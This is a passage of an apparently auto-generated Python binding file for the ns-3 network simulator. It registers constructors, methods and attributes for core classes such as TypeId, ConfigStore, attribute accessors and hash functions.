cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function]
cls.add_method('LookupByHash',
'ns3::TypeId',
[param('uint32_t', 'hash')],
is_static=True)
## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function]
cls.add_method('LookupByHashFailSafe',
'bool',
[param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')],
is_static=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3ConfigStore_methods(root_module, cls):
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore(ns3::ConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConfigStore const &', 'arg0')])
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore() [constructor]
cls.add_constructor([])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
## config-store.h (module 'config-store'): ns3::TypeId ns3::ConfigStore::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## config-store.h (module 'config-store'): static ns3::TypeId ns3::ConfigStore::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFileFormat(ns3::ConfigStore::FileFormat format) [member function]
cls.add_method('SetFileFormat',
'void',
[param('ns3::ConfigStore::FileFormat', 'format')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetMode(ns3::ConfigStore::Mode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::ConfigStore::Mode', 'mode')])
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3HashImplementation_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor]
cls.add_constructor([])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_pure_virtual=True, is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function]
cls.add_method('clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3HashFunctionFnv1a_methods(root_module, cls):
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')])
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor]
cls.add_constructor([])
## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash32_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionHash64_methods(root_module, cls):
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor]
cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')])
## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_Ns3HashFunctionMurmur3_methods(root_module, cls):
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor]
cls.add_constructor([])
## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')],
is_virtual=True)
## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function]
cls.add_method('clear',
'void',
[],
is_virtual=True)
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_Hash(module.get_submodule('Hash'), root_module)
return
